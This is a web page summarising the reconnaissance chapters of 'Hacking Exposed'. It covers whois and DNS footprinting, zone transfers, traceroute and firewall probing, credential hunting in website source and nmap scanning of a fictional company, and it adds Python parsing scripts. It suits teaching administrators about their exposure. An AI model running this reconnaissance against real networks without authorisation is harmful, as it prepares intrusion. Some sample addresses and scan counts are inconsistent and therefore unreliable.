Hacking Exposed

" Where do you want to go today ? "


"Hacking Exposed" is a book that claims to illustrate how hacking is done. By hacking they mean : gaining unauthorised access to a system, then trying to take some level of control over it, or to retrieve information from it. The correct term for this type of activity is not hacking : it's cracking, or intrusion, or network penetration, or computer crime, or what not, but it is not hacking. For marketing purposes, though, "hacking" sounds better.

Some of my opinions about cracking can be found here .

The book further shows how easy it is (or can be) to break into a networked system. The authors present this as a warning to unknowing system administrators, and then go on to explain, in great detail, just how to do it and where to get the tools. So, although the book can serve to educate system administrators about threats to their systems, and how to prevent or cure them, it is at the same time a cookbook for script kiddies.

Still, the first few chapters are interesting, because they explain how such a 'hack' is prepared : they offer insight into aspects of data communication, networking and the internet, and show what a network looks like from the outside. This gives a network administrator an idea of just how 'exposed' his networks and their hosts really are, and that's why I summarize them here, with some examples.


Target

First of all, you need to decide who your target will be. Script kiddies of course skip this step : they go for the weakest victim they can find in a short time, by blindly scanning the internet for open ports and applying exploits created by others.

We will, for this exercise, target an imaginary company, The Silly Software Company. In real life, the target can be any system, for any reason.

Locate the target

When you've decided who your target will be, you'll have to be able to locate them on the network - the internet, most often. That means you need to find some of their IP addresses, or at least the IP address of one server or other host that belongs to your target company. If they have a web server or a mail server, those addresses are easy to find, because they must be published for mail to be delivered and for people to visit the web site. On the other hand, they may have their web site hosted by an external company, or have their mail handled by their ISP's mail server, in which case you will find those IP addresses instead of the company's own. Still, there are a number of ways to find an IP address.

Of course, script kiddies - again - skip this step because they blindly strike out at the easiest or nearest victim : they scan for any system that uses the software for which they've downloaded an 'exploit'.

If you can't find an IP address easily, the next step may provide some.

Network Reconnaissance or "footprinting"

Who is ...

The WHOIS databases are maintained by the domain name registries and registrars (the companies that sell domain names such as google.com and bbc.co.uk) and, for IP address space, by the regional internet registries (ARIN, RIPE, APNIC, ...). The information in these databases can be accessed with tools on your computer (unix/linux : whois), on the web, or via features in certain network administration tools, e.g. Sam Spade. The result may look like this :

   
	microsoft.com 
 	
	Registrant:
	Microsoft Corporation (MICROSOFT-DOM)
	1 microsoft way
	One Microsoft Way
	redmond, WA 98052
	US
	
	Domain Name: MICROSOFT.COM
	
	Administrative Contact:
	MICROSOFT CORPORATION msnhst@MICROSOFT.COM
	One Microsoft Way
	Redmond, WA 98052
	US
	425 882 8080 fax: 206 703 2641
	
	Technical Contact:
	MICROSOFT CORPORATION msnhst@MICROSOFT.COM
	One Microsoft Way
	Redmond, WA 98052
	US
	425-882-8080
	
	Record expires on 03-May-2013.
	Record created on 02-May-1991.
	Database last updated on 21-Mar-2004 07:27:32 EST.
	
	Domain servers in listed order:
	
	DNS1.CP.MSFT.NET 207.46.138.20
	DNS1.TK.MSFT.NET 207.46.245.230
	DNS3.UK.MSFT.NET 213.199.144.151
	DNS1.DC.MSFT.NET 64.4.25.30
	DNS1.SJ.MSFT.NET 65.54.248.222


	

The information can be helpful to get the 'real life' picture of your target (company name, address, phone number), possibly some additional email addresses, and so on. This can be used for educated guesses at user names, passwords and email addresses, or for social engineering (see below).

While people are usually good with words, computers are better with numbers. So a system has been developed to translate words (server names, URLs, ...) into numbers (IP addresses), or vice versa. This is called the Domain Name System, and it consists of a number of servers (DNS servers, name servers) that hold databases with computer names and addresses. Computers interrogate ("query") these DNS servers to find the address if they know the name, or to find a name when they know the address.

The whois info for a domain includes the name servers for that domain, so they're the next thing you'll look into ...

DNS

The DNS system can be queried by any computer, because otherwise your web browser would not be able to find the IP address of 'www.playboy.com' when you're surfing the web, or your email program would not be able to figure out where to send your email.

Consequently, you can interrogate the DNS system to find out about a company's servers and their addresses. The tool you can use is nslookup, which can be found on almost any computer with TCP/IP (Windows 9x being the exception); on unix/linux, dig and host are the more capable alternatives.

Say our target has a web site, www.silly.com.  With

		nslookup www.silly.com

we find that this site's IP address is 204.145.220.17. When we nslookup that address (a reverse lookup), we find it belongs to My Dotcom. Apparently, the Silly Software website is hosted by My DotCom, and we're not interested in them. So, let's see if we can find another server that belongs to the Silly Software Company, maybe a mail server. In interactive mode, nslookup can ask for all record types (ANY) of the domain itself :

		pc01# nslookup
		> silly.com

			Non-authoritative answer:
			Name:    silly.com
			Address: 204.145.220.17

		> set type=ANY
		> silly.com

			Non-authoritative answer:
			silly.com
				primary name server = auth.ns.uu.net
				responsible mail addr = ned.silly.com
			silly.com	MX preference = 10, mail exchanger = mail.silly.com

			Authoritative answers can be found from:
			silly.com	nameserver = auth.ns.uu.net
			silly.com	nameserver = auth02.ns.uu.net
			auth.ns.uu.net		internet address = 222.145.220.213
			auth02.ns.uu.net	internet address = 81.86.235.2
			mail.silly.com		internet address = 207.204.120.8
	

And there it is : the MX record points to mail.silly.com, the Silly Software Company's mail server, at IP address 207.204.120.8. Note the 'responsible mail addr' in the SOA record as well : that is the e-mail address of whoever maintains the zone, with the @ written as a dot, so ned.silly.com means ned@silly.com - our first e-mail address.

More from DNS ?

So far, we've used our own (default) DNS server and had it query the Silly Software DNS servers. That tells us the names and addresses of the DNS servers that are authoritative for the Silly Software Company's silly.com domain. Next, we can have nslookup interrogate the Silly Software name server directly, by setting ' server auth.ns.uu.net '. Querying the authoritative server directly also avoids stale answers from our own server's cache.

Sometimes, DNS servers allow you to download their entire database for a zone. Normally, they should only allow this "zone transfer" (an AXFR query, carried over TCP port 53) to their own secondary name servers, but unless the system administrator configured the server to restrict it, you can get the complete zone with the ls -d command in interactive nslookup (or with dig axfr @server domain, or host -l domain server). You can redirect this information to a file with the > or >> redirection operator. That would give you a complete list of all host names and addresses for a domain - or at least the ones the DNS server knows about.


	ls -d silly.com 
	[auth02.ns.uu.net]
	$ORIGIN silly.com.
	@			6H IN SOA	auth02.ns.uu.net. hostmaster.uu.net. (
					990570		; serial
					6H		; refresh
					1H		; retry
					2w6d		; expiry
					6H )		; minimum

				6H IN NS		auth02.ns.uu.net.
				6H IN NS		auth51.ns.uu.net.
				6H IN A		216.222.35.189
	sergey			6H IN A		207.204.120.25
	scc_gate		6H IN CNAME		scc-gate
	scc-router		6H IN A		207.204.197.15
	switch1			6H IN A		207.204.120.4
	central			6H IN A		207.204.120.5
	main_nt			6H IN A		207.204.120.9
	mail			6H IN A		207.204.120.8
	scc_router		6H IN CNAME		scc-router
	fw			6H IN A		207.204.120.1
	scc-gate		6H IN A		207.204.120.6
	www			6H IN A		204.145.220.17
	uunet-gw		6H IN A		207.204.197.1
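Here is a small Python script, added to this summary as an example (it is not from the book), that parses a zone transfer like the one above and turns it into the inventory an attacker (or an administrator checking his own exposure) wants : A records grouped by /24, private (RFC 1918) addresses that should never have been published, and names that hint at infrastructure. The zone text is a constructed copy of the listing above with one extra record (intranet, 10.1.2.3) added to exercise the private-address check; the list of name fragments treated as infrastructure hints is an assumption.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a copy of the zone listing above in BIND master-file
# syntax, plus one made-up "intranet" record to show the private-address check.
SAMPLE_ZONE = """\
$ORIGIN silly.com.
@               6H IN SOA   auth02.ns.uu.net. hostmaster.uu.net. (
                        990570      ; serial
                        6H          ; refresh
                        1H          ; retry
                        2w6d        ; expiry
                        6H )        ; minimum
                6H IN NS    auth02.ns.uu.net.
                6H IN NS    auth51.ns.uu.net.
                6H IN A     216.222.35.189
sergey          6H IN A     207.204.120.25
scc_gate        6H IN CNAME scc-gate
scc-router      6H IN A     207.204.197.15
switch1         6H IN A     207.204.120.4
central         6H IN A     207.204.120.5
main_nt         6H IN A     207.204.120.9
mail            6H IN A     207.204.120.8
fw              6H IN A     207.204.120.1
scc-gate        6H IN A     207.204.120.6
www             6H IN A     204.145.220.17
uunet-gw        6H IN A     207.204.197.1
intranet        6H IN A     10.1.2.3
"""

TYPES = ('A', 'CNAME', 'NS', 'MX')
TTL_RE = re.compile(r'\d+[smhdw]?', re.I)          # 6H, 3600, 1w ...
# Hostname fragments that usually mean network infrastructure (assumption).
INFRA_HINTS = ('fw', 'gw', 'gate', 'router', 'switch', 'vpn', 'proxy')


def fqdn(name, origin):
    if name == '@':
        return origin
    return name if name.endswith('.') else f'{name}.{origin}'


def parse_zone(text):
    """Return (owner, type, rdata) triples for A/CNAME/NS/MX records.
    Owners are made fully qualified; a line starting with whitespace inherits
    the owner of the previous record, as in a master file."""
    origin, owner, records = '', '', []
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].rstrip()        # drop comments
        if not line.strip():
            continue
        if line.startswith('$ORIGIN'):
            origin = line.split()[1]
            continue
        if not line[0].isspace():                   # explicit owner name
            parts = line.split(None, 1)
            owner, line = parts[0], parts[1] if len(parts) > 1 else ''
        tokens = line.split()
        while tokens and (tokens[0].upper() == 'IN' or TTL_RE.fullmatch(tokens[0])):
            tokens.pop(0)                           # skip optional TTL / class
        if len(tokens) < 2 or tokens[0] not in TYPES:
            continue                                # SOA and its continuation lines
        records.append((fqdn(owner, origin), tokens[0], ' '.join(tokens[1:])))
    return records


def summarize(records):
    """Group A records by /24; flag private addresses and infrastructure-like names."""
    by_net, private, infra = defaultdict(list), [], []
    for name, rtype, rdata in records:
        if rtype != 'A':
            continue
        ip = ipaddress.ip_address(rdata)
        by_net[str(ipaddress.ip_network(f'{ip}/24', strict=False))].append(name)
        if ip.is_private:
            private.append((name, rdata))
        host = name.split('.')[0].lower()
        if any(hint in host for hint in INFRA_HINTS):
            infra.append((name, rdata))
    return dict(by_net), private, infra


if __name__ == '__main__':
    nets, private, infra = summarize(parse_zone(SAMPLE_ZONE))
    for net, names in sorted(nets.items()):
        print(net, ', '.join(names))
    print('private addresses published:', private)
    print('infrastructure-looking names:', infra)
```

Run it on the output of ls -d (or dig axfr) saved to a file and you get, in one go, the list of networks to look at next and the records an administrator would rather not have published.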
	
	

If a zone transfer fails (it should, really : zone transfers to foreign systems should be refused by the DNS administrator, but sometimes they forget), you can still do a DNS query of type ANY, look for specific records (NS, MX), or run the unix 'host' command against a list of addresses or host names, or against the domain name. Reverse lookups (PTR records) of every address in a range you already know are another way to harvest names without a zone transfer.

	ix:~$ host microsoft.com
	microsoft.com has address 207.46.197.32
	microsoft.com has address 207.46.232.182
	microsoft.com mail is handled by 10 maila.microsoft.com.
	microsoft.com mail is handled by 10 mailb.microsoft.com.
	microsoft.com mail is handled by 10 mailc.microsoft.com.

	

Back and Forth

Information from whois (RIPE, ARIN and the other regional registries) gives you, among other things, names and IP addresses of name servers, and the network ranges registered to the target company. DNS then reveals more names and addresses. IP addresses can in turn be queried in whois, to reveal the registrant of the network range they belong to. With some back and forth between whois and DNS, you end up with a nice list of (public) networks, hosts, and their IP addresses. If the DNS administrator was careless enough to include internal names and/or private (RFC 1918) addresses in his public DNS zone, you also get a first look at what the internal LAN may look like.

When you run whois with an IP address, you find the network range it belongs to and who registered it (and possibly other ranges of the same registrant). Here is a Microsoft example again :

	ix:~$ whois 65.54.240.126

	OrgName:    Microsoft Corp
	OrgID:      MSFT
	Address:    One Microsoft Way
	City:       Redmond
	StateProv:  WA
	PostalCode: 98052
	Country:    US
	
	NetRange:   65.52.0.0 - 65.55.255.255
	CIDR:       65.52.0.0/14
	
	

So, going back and forth between whois (RIPE, ARIN, ...) and DNS, it's trivial to find at least the public parts of a network.
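The 'back and forth' step in code, as an added example (not from the book) : parse the whois answer for an address into its fields, turn the NetRange / CIDR lines into networks, and check which of the hosts found so far fall inside them. Whatever falls outside belongs to another registrant (the ISP, a hosting company, ...) and is the input for the next whois query. The whois text is a constructed copy of the Microsoft answer shown above.

```python
import ipaddress
import re

# Constructed: the whois answer for 65.54.240.126 quoted above.
SAMPLE_WHOIS = """\
OrgName:    Microsoft Corp
OrgID:      MSFT
Address:    One Microsoft Way
City:       Redmond
StateProv:  WA
PostalCode: 98052
Country:    US

NetRange:   65.52.0.0 - 65.55.255.255
CIDR:       65.52.0.0/14
"""


def parse_whois(text):
    """Collect 'Key: value' lines; the first occurrence of a key wins."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r'^([A-Za-z]+):\s*(.*\S)\s*$', line)
        if m:
            fields.setdefault(m.group(1), m.group(2))
    return fields


def registered_networks(fields):
    """Networks the registrant holds: use the CIDR line when present,
    otherwise summarize the NetRange (first - last) into CIDR blocks."""
    if 'CIDR' in fields:
        return [ipaddress.ip_network(c.strip()) for c in fields['CIDR'].split(',')]
    first, last = (ipaddress.ip_address(x.strip()) for x in fields['NetRange'].split('-'))
    return list(ipaddress.summarize_address_range(first, last))


def classify_hosts(hosts, networks, owner):
    """Map each discovered address to the known owner, or mark it for another
    whois round: this is the 'back and forth' loop in code."""
    result = {}
    for h in hosts:
        ip = ipaddress.ip_address(h)
        result[h] = owner if any(ip in n for n in networks) else 'unknown: query whois'
    return result


if __name__ == '__main__':
    fields = parse_whois(SAMPLE_WHOIS)
    nets = registered_networks(fields)
    print(fields['OrgName'], [str(n) for n in nets])
    # two addresses from this page: one inside the Microsoft range, one not
    print(classify_hosts(['65.54.240.126', '207.204.120.8'], nets, fields['OrgName']))
```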

traceroute

During the 'footprinting' process, you've located a number of machines or networks. At this point, you already have enough to stage a denial of service attack against one of those machines, if that kind of thing is your goal.

You may also want to have a closer look at the company's network. Let's see which route an IP packet follows to go from our system to those machines : we trace a route (with traceroute on Linux or tracert on Windows). This shows all routers between our system and the Silly Software Company's name server, including the router that connects them to the internet, and maybe even their firewall. We can do the same for their mail server, or any other server we know of.

traceroute / tracert


	Tracing route to mail.silly.com [207.204.120.8] 30 hops max:

	[...]
	 17   104 ms   103 ms   110 ms  0.so-3-0-0.XL1.NYC1.ALTER.NET [152.63.27.29] 
	 18   104 ms   103 ms   103 ms  0.so-0-0-0.XR1.NYC1.ALTER.NET [152.63.19.85] 
	 19   104 ms   123 ms   104 ms  207.ATM7-0.GW11.NYC1.ALTER.NET [152.63.22.145] 
	 20   107 ms   112 ms   107 ms  scc-ext-gw.customer.alter.net [156.131.7.202] 
	 21     *        *        *     Timeout 
	 22   
	[...]
	Trace completed.

	Tracing route to central.silly.com [207.204.120.5] 30 hops max:
	[...]
	 18   102 ms   103 ms   102 ms  0.so-0-0-0.XR2.NYC1.ALTER.NET [152.63.19.97] 
	 19   110 ms   106 ms   103 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149] 
	 20   106 ms   107 ms   106 ms  scc-ext-gw.customer.alter.net [156.131.7.202] 
	 21     *        *        *     Timeout.

	[...]
	Trace completed.

	

Comparing both routes with the IP addresses of the servers leads to a preliminary conclusion that 156.131.7.202 may be their external gateway (the router that connects them to the internet).

This router is on the route to the hosts we're tracing, but we get no replies from beyond it. This may indicate that the next device doesn't answer traceroute probes, or that it drops them (a firewall ?). More about tracing hosts behind firewalls, and how to interpret the time-outs, can be found in the traceroute man page. Classic traceroute sends UDP probes to an increasing destination port; by choosing the starting port (-p) so that the probe that arrives at the firewall is addressed to a port it lets through (e.g. 53), it is sometimes possible to trace beyond it. Sending ICMP echo probes instead (traceroute -I), or TCP SYN probes to a port that is known to be open (tcptraceroute), works on the same principle, and a tool such as Firewalk automates the trick to map which ports the firewall passes.
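The comparison made above, as an added example (not from the book) : parse several tracert outputs, find the deepest responding hop they all have in common (the candidate border router), and report per trace whether anything beyond it answered. The three traces are constructed from the ones shown on this page (with the third one, to scc-router, taken from the Explore section further down); hops before 17 are left out.

```python
import re

# Constructed traces, modelled on the tracert output above (early hops omitted).
TRACE_MAIL = """\
Tracing route to mail.silly.com [207.204.120.8] 30 hops max:
 17   104 ms   103 ms   110 ms  0.so-3-0-0.XL1.NYC1.ALTER.NET [152.63.27.29]
 18   104 ms   103 ms   103 ms  0.so-0-0-0.XR1.NYC1.ALTER.NET [152.63.19.85]
 19   104 ms   123 ms   104 ms  207.ATM7-0.GW11.NYC1.ALTER.NET [152.63.22.145]
 20   107 ms   112 ms   107 ms  scc-ext-gw.customer.alter.net [156.131.7.202]
 21     *        *        *     Request timed out.
 22     *        *        *     Request timed out.
Trace complete.
"""
TRACE_CENTRAL = """\
Tracing route to central.silly.com [207.204.120.5] 30 hops max:
 18   102 ms   103 ms   102 ms  0.so-0-0-0.XR2.NYC1.ALTER.NET [152.63.19.97]
 19   110 ms   106 ms   103 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149]
 20   106 ms   107 ms   106 ms  scc-ext-gw.customer.alter.net [156.131.7.202]
 21     *        *        *     Request timed out.
Trace complete.
"""
TRACE_ROUTER = """\
Tracing route to scc-router.silly.com [207.204.197.15] 30 hops max:
 19   104 ms   108 ms   105 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149]
 20   106 ms   108 ms   107 ms  scc-ext-gw.customer.alter.net [156.131.7.202]
 21   112 ms   108 ms   107 ms  scc-router.silly.com [207.204.197.15]
Trace complete.
"""

HOP_RE = re.compile(r'^\s*(\d+)\s+(.*?)\s*$')
ADDR_RE = re.compile(r'\[?(\d{1,3}(?:\.\d{1,3}){3})\]?\s*$')


def parse_trace(text):
    """Return [(hop, name, ip)]; name and ip are None for hops that did not answer."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        hop, rest = int(m.group(1)), m.group(2)
        a = ADDR_RE.search(rest)
        if not a:
            hops.append((hop, None, None))
            continue
        before = rest[:a.start()].split()
        name = before[-1] if before and before[-1] != 'ms' else None  # tracert prints "ip" alone when no rDNS
        hops.append((hop, name, a.group(1)))
    return hops


def hop_number(hops, ip):
    return next(h[0] for h in hops if h[2] == ip)


def analyse(traces):
    """Find the deepest responding hop common to all traces (the likely border
    router) and, per trace, what was seen beyond it."""
    common = set.intersection(*(set(h[2] for h in t if h[2]) for t in traces))
    if not common:
        return None, []
    border_ip = max(common, key=lambda ip: hop_number(traces[0], ip))
    border_name = next(h[1] for h in traces[0] if h[2] == border_ip)
    report = []
    for hops in traces:
        beyond = [h for h in hops if h[0] > hop_number(hops, border_ip)]
        replies = [(h[1], h[2]) for h in beyond if h[2]]
        report.append({'probes_beyond_border': len(beyond),
                       'replies_beyond_border': replies,
                       'looks_filtered': bool(beyond) and not replies})
    return (border_name, border_ip), report


if __name__ == '__main__':
    border, report = analyse([parse_trace(t) for t in (TRACE_MAIL, TRACE_CENTRAL, TRACE_ROUTER)])
    print('candidate border router:', border)
    for target, r in zip(('mail', 'central', 'scc-router'), report):
        print(target, r)
```

The interesting output is the contrast : the traces to the 207.204.120.x hosts go silent right after the border router, while the trace to 207.204.197.15 gets one hop further, which is exactly the observation the Explore section builds on.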

War Dialing

In this day and age, who the fsck still uses modems ?
You'd be surprised. Modems are still quite frequently used : in older, yet-to-be-upgraded networks, for specific applications where network connectivity is not (yet) feasible, as a cheap solution for vendor remote assistance (e.g. to a PBX), ...

So if you're going war dialing, you may still find a number of modems, connected to PBXs, personal computers, dial-up servers, ... The interesting part about them is that these modem connections bypass any network firewall.

The best-known war dialing tools were developed for DOS PCs; ToneLoc is a fine example.

Wireless

With wireless networks all over the place, war dialing has been reinvented in the form of war driving : driving around looking for wireless networks, then trying to connect to them. Here is a proof of concept. Other forms of wireless data communication (Bluetooth, infrared, ...), especially with support for 'ad-hoc networking', also deserve attention.

Enumeration

So far, so good

So far, we've collected a number of hostnames and their IP addresses, and we have a rough idea of the IP range The Silly Software Company is using, so we can make an educated guess at other IP addresses they may be using. We have at least one email address, so we can guess what other email addresses may look like. We know a thing or two about the local network at the Silly Software Company : at least the address of their external (border) router, maybe a bit more (there's probably a firewall).

The next step is to collect as much additional information as possible. This is called 'enumerating the network'. There are a lot of tools to be found on the web, but often they are just friendly user interfaces for the techniques described below.

Websites ... may the source be with you

Web sites can be interesting ... First of all, you might find some people's names, email addresses, and other information that can be useful for 'social engineering'. The source code of the website may be even more interesting, and it's readily available in your browser (although it may be handier to just download the entire site, and use some text search and filtering tools to find what you're after). Things of interest : scripts and comments. Lazy or incompetent web developers resort to cheap tricks in client-side code, e.g. prices or access levels in 'hidden' form fields that the server then trusts, or clear text user names and passwords in a database connect string. Looking at a website's source can reveal interesting information.

tools : wget, grep, ...
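As an added example (not from the book), here is the kind of filter you would run over a site mirrored with wget : it pulls hidden form fields, developer comments, mailto addresses and anything in client-side script that looks like a credential. The HTML is a constructed sample page built to contain the mistakes described above; the patterns for credential-like keys and for hidden fields that carry a server-side decision are assumptions you would extend for a real site.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not from any real site) with the kind of mistakes
# the text describes: a credential in client-side script, a developer comment,
# and hidden fields that carry data the server should never trust.
SAMPLE_HTML = """<html><head>
<!-- TODO: remove test login admin / s3cret before go-live -->
<script>
  var conn = "Provider=SQLOLEDB;Data Source=db1.silly.com;User ID=webapp;Password=Summer2004";
</script></head>
<body>
<form action="/order.asp" method="post">
  <input type="hidden" name="price" value="19.99">
  <input type="hidden" name="is_admin" value="0">
  <input type="hidden" name="session_token" value="a1b2c3">
  <input type="text" name="qty">
  Contact: <a href="mailto:ned@silly.com">Ned</a>
</form></body></html>"""

# Key names that tend to precede credentials (assumption; extend as needed).
SECRET_RE = re.compile(
    r'\b(password|passwd|pwd|user\s*id|uid|api[_-]?key)\s*[=:]\s*["\']?([^"\';\s]+)', re.I)
# Hidden-field names that suggest a server-side decision is taken client-side.
TRUST_RE = re.compile(r'price|total|discount|admin|role|level', re.I)


class SourceInspector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden_fields, self.comments, self.scripts, self.emails = [], [], [], set()
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'input' and (a.get('type') or '').lower() == 'hidden':
            self.hidden_fields.append((a.get('name'), a.get('value')))
        elif tag == 'script':
            self._in_script = True
        elif tag == 'a' and (a.get('href') or '').lower().startswith('mailto:'):
            self.emails.add(a['href'][7:])

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:                 # script bodies arrive here as raw text
            self.scripts.append(data)

    def handle_comment(self, data):
        self.comments.append(data.strip())


def inspect_source(html):
    """Return hidden fields, the suspicious ones, credential-like leaks, comments and e-mails."""
    p = SourceInspector()
    p.feed(html)
    p.close()
    leaks = [(m.group(1).lower(), m.group(2))
             for text in p.scripts + p.comments for m in SECRET_RE.finditer(text)]
    suspicious = [(n, v) for n, v in p.hidden_fields if TRUST_RE.search(n or '')]
    return {'hidden': p.hidden_fields, 'suspicious_hidden': suspicious,
            'leaks': leaks, 'emails': sorted(p.emails), 'comments': p.comments}


if __name__ == '__main__':
    for key, value in inspect_source(SAMPLE_HTML).items():
        print(f'{key}: {value}')
```

Point it at every .htm / .asp / .js file wget saved (glob the directory and feed each file to inspect_source) and grep the result; the 'suspicious_hidden' list is also exactly what a developer should review before go-live, since a hidden field is just a request parameter the user can edit.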

Explore

You could first explore a bit more, e.g. by tracing routes to other addresses in the same range. Hosts that don't reply to a ping might still show up as a hop, or reveal their hostname through a reverse (PTR) lookup. It may also give you a clearer picture of the IP ranges in use.

In this case, we might have assumed that The Silly Software Company uses a range of 16 addresses (i.e. 14 hosts) or a range of 32 addresses (30 hosts). The DNS lookup, however, revealed that more addresses are in use, spread from 207.204.120.1 to 207.204.120.231. This suggests a complete class C sized network (207.204.120.1 to .254, subnet mask 255.255.255.0, a /24), because the next smaller subnet (mask 255.255.255.128, a /25) only covers .1 to .126 and cannot contain .231. A couple of whois queries should be enough to shed some light on this.

Note that the DNS lookup also shows a couple of addresses outside this range. When we trace a route to that additional router, scc-router or 207.204.197.15, we notice that it is one hop behind the external gateway - while the previous traces stopped at the external gateway :

	 19   104 ms   108 ms   105 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149]
 	 20   106 ms   108 ms   107 ms  scc-ext-gw.customer.alter.net [157.130.7.202]
 	 21   112 ms   108 ms   107 ms  scc-router.silly.com [207.204.197.15]
 	Trace completed
	

This suggests the Silly Software Company has a second network, separate from 207.204.120.0. Routers usually get the first or last usable address in a range, and here we see uunet-gw at .1 and scc-router at .15. Note that a 16-address block (207.204.197.0/28, mask 255.255.255.240) only has 14 usable hosts, .1 to .14 : .15 would be its broadcast address, which no router can answer from. So the block must be bigger, at least a /27 (207.204.197.0 to .31, mask 255.255.255.224, 30 hosts), with scc-router somewhere in the middle rather than at the end. Again, a whois query on the range can settle it.

We've also found the following interesting looking names :

	name                           address          comment
	scc-ext-gw.customer.alter.net  157.130.7.202    external gateway ? on the ISP's network ?
	fw                             207.204.120.1    firewall ?
	scc-router                     207.204.197.15   another router ? apparently in a different address range ...
	scc-gate                       207.204.120.6    another gateway / router ? routers usually have addresses at the start or the end of a range, so this would be unusual
	switch1                        207.204.120.4    another gateway / router ?
	uunet-gw                       207.204.197.1
	fwext                          207.204.197.10
	---                            207.204.120.254  routers usually have addresses at the start or the end of a range, so we could check this one as well
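The subnet reasoning of this section, as an added example in Python (not from the book) : given the addresses observed for a site, compute the smallest CIDR block that contains them, then grow it until none of the observed hosts sits on a network or broadcast address (a host answering from such an address proves the block is bigger), and list the first and last usable address, where routers usually live. The addresses are the ones from the zone transfer above.

```python
import ipaddress


def smallest_enclosing(addrs):
    """Smallest CIDR block that contains every address in addrs."""
    ips = [ipaddress.ip_address(a) for a in addrs]
    net = ipaddress.ip_network(f'{ips[0]}/32')
    while not all(ip in net for ip in ips):
        net = net.supernet()
    return net


def smallest_with_all_usable(addrs):
    """Like smallest_enclosing, but refuse blocks in which one of the observed
    hosts would sit on the network or broadcast address: a host that answers
    from such an address tells you the block must be bigger."""
    ips = [ipaddress.ip_address(a) for a in addrs]
    net = smallest_enclosing(addrs)
    while any(ip in (net.network_address, net.broadcast_address) for ip in ips):
        net = net.supernet()
    return net


def gateway_candidates(net):
    """First and last usable address: where routers usually live."""
    hosts = list(net.hosts())
    return str(hosts[0]), str(hosts[-1])


def describe(addrs):
    net = smallest_with_all_usable(addrs)
    return {'network': str(net), 'netmask': str(net.netmask),
            'usable_hosts': net.num_addresses - 2,
            'gateway_candidates': gateway_candidates(net)}


if __name__ == '__main__':
    # addresses taken from the zone transfer above
    print(describe(['207.204.120.1', '207.204.120.25', '207.204.120.231']))
    print(describe(['207.204.197.1', '207.204.197.10', '207.204.197.15']))
```

For the 207.204.120 addresses this yields the /24 with .1 and .254 as candidate router addresses; for 207.204.197.{1,10,15} the enclosing block is a /28, but because .15 answers it is promoted to a /27. Whois then tells you whether the registrar agrees.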

Port Scan

We can now use a port scanner to see which ports are open (or closed, or filtered) on the hosts we already know. This will give us information about what these machines are supposed to be doing, and it may reveal some possible points of attack. nmap (Network Mapper) is a popular port scanner. Its output may look something like this :

	
	Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2004-03-21 12:03 
	Interesting ports on www.my.com (82.283.162.210):
	(The 1648 ports scanned but not shown below are in state: filtered)
	PORT    STATE SERVICE
	21/tcp  open  ftp
	22/tcp  open  ssh
	26/tcp  open  unknown
	53/tcp  open  domain
	80/tcp  open  http
	110/tcp open  pop-3
	143/tcp open  imap
	443/tcp open  https
	995/tcp open  pop3s

	Nmap run completed -- 1 IP address (1 host up) scanned in 135.290 seconds

	

nmap can also scan IP ranges, so it can be used to find other hosts on the network as well. Use your knowledge of IP addressing and subnetting to define a suitable range, or (if you have the time, or lack the knowledge) scan everything.

On top of that, and among other features, nmap can make a first guess at the operating system of the hosts you're scanning (the -O option), so there's another interesting piece of information out there.

Here's a summary of a number of scans. nmap has many options, each of which can reveal something particular about the targeted network.

	# nmap 3.48 scan initiated Sat Mar 27 12:43:12 2004 as: 
	nmap -sS -O -P0 -R -p1352 -oN log 207.204.120.1-15 
	
	Interesting ports on scc-int-gw-e0.silly.com (207.204.120.1):
	PORT     STATE    SERVICE
	1352/tcp filtered lotusnotes
	
	Device type: general purpose
	Running: Microsoft Windows NT/2K/XP
	OS details: Microsoft Windows NT 4.0 SP 6a + hotfixes
	[repeated at every host]
	
	Interesting ports on firewall2.silly.com (207.204.120.2):
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	747/tcp filtered fujitsu-dev
	1352/tcp closed lotusnotes
	
	
	Interesting ports on 207.204.120.3:
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	747/tcp filtered fujitsu-dev
	1352/tcp closed lotusnotes
	1723/tcp filtered pptp
	
	
	Interesting ports on switch1.silly.com (207.204.120.4):
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	183/tcp filtered ocbinder
	1352/tcp filtered lotusnotes
	
	
	Interesting ports on central.silly.com (207.204.120.5):
	(The 65535 ports scanned but not shown below are in state: filtered)
	PORT     STATE  SERVICE
	1352/tcp open   lotusnotes
	5631/tcp open   pcanywheredata
	5632/tcp closed pcanywherestat
	5900/tcp open   vnc
	
	Device type: general purpose
	Running: Sun Solaris 2.X|7, Microsoft Windows NT/2K/XP
	OS details: Sun Solaris 2.6 - 7 (SPARC), Microsoft Windows NT 4.0 SP 6a + hotfixes
	
	
	Interesting ports on scc_gate.silly.com (207.204.120.6):
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	180/tcp filtered ris
	747/tcp filtered fujitsu-dev
	1352/tcp filtered lotusnotes
	
	
	Interesting ports on 207.204.120.7:
	PORT     STATE    SERVICE
	1352/tcp filtered lotusnotes
	
	Interesting ports on mail.silly.com (207.204.120.8):
	PORT     STATE SERVICE
	1352/tcp open  lotusnotes

	Interesting ports on main_nt.silly.com (207.204.120.9):
	PORT 	   STATE    SERVICE
	1352/tcp filtered lotusnotes
	
	
	[etc ..]


	All 65535 scanned ports on 207.204.120.24 are: closed
	
	All 65535 scanned ports on sergey.silly.com (207.204.120.25) are: closed
	
	All 65535 scanned ports on 207.204.120.26 are: closed
	All 65535 scanned ports on 207.204.120.27 are: closed
	
	Interesting ports on 207.204.120.28:
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT     STATE    SERVICE
	1650/tcp filtered nkd
	
